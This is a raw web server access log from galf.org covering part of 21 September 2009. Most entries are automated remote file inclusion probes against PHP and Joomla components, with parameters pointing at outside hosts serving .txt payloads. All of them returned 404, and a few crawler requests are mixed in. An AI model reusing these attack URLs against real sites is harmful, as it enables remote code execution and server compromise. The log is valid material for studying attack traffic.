67.225.196.53 - - [21/Sep/2009:12:32:46 -0700] "GET /logs/access_090420.log%20%20/modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.225.196.53 - - [21/Sep/2009:12:32:46 -0700] "GET /logs/modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.225.196.53 - - [21/Sep/2009:12:32:46 -0700] "GET /modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.225.196.53 - - [21/Sep/2009:12:33:53 -0700] "GET /logs/access.log%20%20/modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:12:33:53 -0700] "GET /logs/access.log%20%20/modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:12:34:05 -0700] "GET /logs/access_090420.log/modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.225.196.53 - - [21/Sep/2009:12:34:05 -0700] "GET /logs/modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.225.196.53 - - [21/Sep/2009:12:34:05 -0700] "GET /modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.225.196.53 - - [21/Sep/2009:12:34:08 -0700] "GET /modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.142.121.41 - - [21/Sep/2009:12:34:18 -0700] "GET /logs/access_090629.log%20//step_one.php?server_inc=http://soxs.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
219.142.121.41 - - [21/Sep/2009:12:34:18 -0700] "GET /step_one.php?server_inc=http://soxs.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
219.142.121.41 - - [21/Sep/2009:12:34:18 -0700] "GET /logs//step_one.php?server_inc=http://soxs.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
222.236.47.182 - - [21/Sep/2009:12:34:28 -0700] "GET /logs/access.log%20%20//include.php?path[docroot]=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.236.47.182 - - [21/Sep/2009:12:34:29 -0700] "GET /logs//include.php?path[docroot]=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:12:35:39 -0700] "GET /modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.225.196.53 - - [21/Sep/2009:12:35:39 -0700] "GET /logs/modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.225.196.53 - - [21/Sep/2009:12:35:43 -0700] "GET /modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.225.196.53 - - [21/Sep/2009:12:35:43 -0700] "GET /logs/modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.225.196.53 - - [21/Sep/2009:12:35:44 -0700] "GET /logs/access_090420.log%20%20/modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.225.196.53 - - [21/Sep/2009:12:35:47 -0700] "GET /logs/access_090420.log%20%20/modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.43.194.3 - - [21/Sep/2009:12:36:11 -0700] "GET /logs//modules.php?name=http://soxs.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
208.43.194.3 - - [21/Sep/2009:12:36:12 -0700] "GET /modules.php?name=http://soxs.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
208.43.194.3 - - [21/Sep/2009:12:36:12 -0700] "GET /logs/access_090511.log%20//modules.php?name=http://soxs.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
121.125.74.87 - - [21/Sep/2009:12:37:16 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:37:16 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:37:17 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:37:21 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:37:23 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:37:24 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:37:24 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:37:24 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:37:29 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:37:29 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:37:29 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
128.112.139.236 - - [21/Sep/2009:12:37:33 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "nu_tch-princeton/Nu_tch-1.0-dev (princeton crawler for cass project; http://www.cs.princeton.edu/cass/; zhewang a_t cs ddot princeton dot edu)" "www.galf.org"
128.112.139.236 - - [21/Sep/2009:12:37:33 -0700] "GET /cendoc.php HTTP/1.0" 404 275 "-" "nu_tch-princeton/Nu_tch-1.0-dev (princeton crawler for cass project; http://www.cs.princeton.edu/cass/; zhewang a_t cs ddot princeton dot edu)" "www.galf.org"
121.125.74.87 - - [21/Sep/2009:12:38:20 -0700] "GET /logs/access.log/modules/My_eGallery/public/functions.php?basepath=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:38:20 -0700] "GET /logs/modules/My_eGallery/public/functions.php?basepath=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:38:20 -0700] "GET /modules/My_eGallery/public/functions.php?basepath=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:41:46 -0700] "GET /logs/access.log%20%20/modules/My_eGallery/public/functions.php?basepath=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:41:54 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:42:02 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:44:10 -0700] "GET /logs/access_090420.log%20%20/modules/My_eGallery/public/functions.php?basepath=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [21/Sep/2009:12:44:10 -0700] "GET /logs/modules/My_eGallery/public/functions.php?basepath=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [21/Sep/2009:12:44:10 -0700] "GET /modules/My_eGallery/public/functions.php?basepath=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
83.170.122.30 - - [21/Sep/2009:12:45:36 -0700] "GET /index.php/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
83.170.122.30 - - [21/Sep/2009:12:45:37 -0700] "GET /logs/index.php/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
218.27.203.107 - - [21/Sep/2009:12:50:54 -0700] "GET /logs/access_090824.log%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [21/Sep/2009:12:50:54 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [21/Sep/2009:12:50:55 -0700] "GET /logs/access_090323.log%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [21/Sep/2009:12:50:55 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.107.182 - - [21/Sep/2009:12:52:51 -0700] "GET /logs/?S=A HTTP/1.1" 200 4799 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
121.125.74.87 - - [21/Sep/2009:12:56:11 -0700] "GET /modules/My_eGallery/public/imageFunctions.php?basepath=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:56:12 -0700] "GET /logs/access.log/modules/My_eGallery/public/imageFunctions.php?basepath=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:56:12 -0700] "GET /logs/modules/My_eGallery/public/imageFunctions.php?basepath=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:58:26 -0700] "GET /logs/access.log%20%20/modules/My_eGallery/public/imageFunctions.php?basepath=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
65.55.207.21 - - [21/Sep/2009:13:01:11 -0700] "GET / HTTP/1.1" 200 1048 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
121.125.74.87 - - [21/Sep/2009:13:01:19 -0700] "GET /modules/My_eGallery/public/imageFunctions.php?basepath=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [21/Sep/2009:13:01:19 -0700] "GET /logs/modules/My_eGallery/public/imageFunctions.php?basepath=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [21/Sep/2009:13:01:19 -0700] "GET /logs/access_090420.log%20%20/modules/My_eGallery/public/imageFunctions.php?basepath=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [21/Sep/2009:13:02:06 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [21/Sep/2009:13:02:06 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
83.170.122.30 - - [21/Sep/2009:13:03:28 -0700] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
83.170.122.30 - - [21/Sep/2009:13:03:29 -0700] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
91.149.157.136 - - [21/Sep/2009:13:03:52 -0700] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.sydneyfreeskate.com/forum//idv66ok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
91.149.157.136 - - [21/Sep/2009:13:03:52 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.sydneyfreeskate.com/forum//idv66ok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
91.149.157.136 - - [21/Sep/2009:13:03:52 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.sydneyfreeskate.com/forum//idv66ok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
61.100.5.136 - - [21/Sep/2009:13:04:56 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.100.5.136 - - [21/Sep/2009:13:04:56 -0700] "GET /logs/access.log%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.100.5.136 - - [21/Sep/2009:13:04:56 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
217.169.210.130 - - [21/Sep/2009:13:06:22 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_jce&_REQUEST%5bItemid%5d=5&GLOBALS=&mosConfig_absolute_path=http://home.covenantberks.org/language/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.169.210.130 - - [21/Sep/2009:13:06:22 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_jce&_REQUEST%5bItemid%5d=5&GLOBALS=&mosConfig_absolute_path=http://home.covenantberks.org/language/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.169.210.130 - - [21/Sep/2009:13:06:23 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_jce&_REQUEST%5bItemid%5d=5&GLOBALS=&mosConfig_absolute_path=http://home.covenantberks.org/language/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
83.170.122.30 - - [21/Sep/2009:13:08:36 -0700] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://ski.spb.ru/sklons/KURORTI-AVSTRII/mairhofen/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
200.101.70.1 - - [21/Sep/2009:13:09:57 -0700] "GET /logs/access_090608.log%20%20/playing.php/common/db.php?commonpath=http://www.freewebtown.com/ppkkssss/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
200.101.70.1 - - [21/Sep/2009:13:10:52 -0700] "GET /logs/access_090615.log%20%20/playing.php/common/db.php?commonpath=http://www.freewebtown.com/ppkkssss/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
83.170.122.30 - - [21/Sep/2009:13:11:12 -0700] "GET /logs/access.log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://ski.spb.ru/sklons/KURORTI-AVSTRII/mairhofen/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
217.169.210.130 - - [21/Sep/2009:13:11:12 -0700] "GET /logs/access_090420.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_extcalendar&_REQUEST%5bItemid%5d=5&GLOBALS=&mosConfig_absolute_path=http://home.covenantberks.org/language/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.169.210.130 - - [21/Sep/2009:13:11:12 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_extcalendar&_REQUEST%5bItemid%5d=5&GLOBALS=&mosConfig_absolute_path=http://home.covenantberks.org/language/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
83.170.122.30 - - [21/Sep/2009:13:11:12 -0700] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://ski.spb.ru/sklons/KURORTI-AVSTRII/mairhofen/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
83.170.122.30 - - [21/Sep/2009:13:11:12 -0700] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://ski.spb.ru/sklons/KURORTI-AVSTRII/mairhofen/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
217.169.210.130 - - [21/Sep/2009:13:11:12 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_extcalendar&_REQUEST%5bItemid%5d=5&GLOBALS=&mosConfig_absolute_path=http://home.covenantberks.org/language/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
121.125.74.87 - - [21/Sep/2009:13:17:31 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:13:17:56 -0700] "GET /logs/access_090420.log/modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.225.196.53 - - [21/Sep/2009:13:18:09 -0700] "GET /logs/access_090420.log/modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.169.210.130 - - [21/Sep/2009:13:20:01 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_extcalendar&_REQUEST%5bItemid%5d=5&GLOBALS=&mosConfig_absolute_path=http://home.covenantberks.org/language/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "galf.org"
217.169.210.130 - - [21/Sep/2009:13:20:01 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_extcalendar&_REQUEST%5bItemid%5d=5&GLOBALS=&mosConfig_absolute_path=http://home.covenantberks.org/language/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "galf.org"
217.169.210.130 - - [21/Sep/2009:13:20:02 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_extcalendar&_REQUEST%5bItemid%5d=5&GLOBALS=&mosConfig_absolute_path=http://home.covenantberks.org/language/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "galf.org"
121.125.74.87 - - [21/Sep/2009:13:20:07 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:13:20:08 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:13:20:19 -0700] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
199.120.90.223 - - [21/Sep/2009:13:22:11 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
199.120.90.223 - - [21/Sep/2009:13:22:11 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
199.120.90.223 - - [21/Sep/2009:13:22:33 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:13:22:37 -0700] "GET /modules/My_eGallery/public/mainGallery.php?basepath=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:13:22:37 -0700] "GET /logs/modules/My_eGallery/public/mainGallery.php?basepath=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:13:22:37 -0700] "GET /logs/access.log/modules/My_eGallery/public/mainGallery.php?basepath=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:13:23:28 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:13:23:28 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:13:23:28 -0700] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:13:23:36 -0700] "GET /modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:13:23:36 -0700] "GET /logs/modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:13:23:36 -0700] "GET /logs/access.log/modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:13:23:38 -0700] "GET /logs/access.log/modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:13:23:38 -0700] "GET /logs/modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:13:23:38 -0700] "GET /modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:13:23:43 -0700] "GET /logs/modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:13:23:43 -0700] "GET /modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:13:23:43 -0700] "GET /logs/access.log%20%20/modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:13:23:43 -0700] "GET /logs/access.log%20%20/modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:13:23:43 -0700] "GET /modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:13:23:43 -0700] "GET /logs/modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
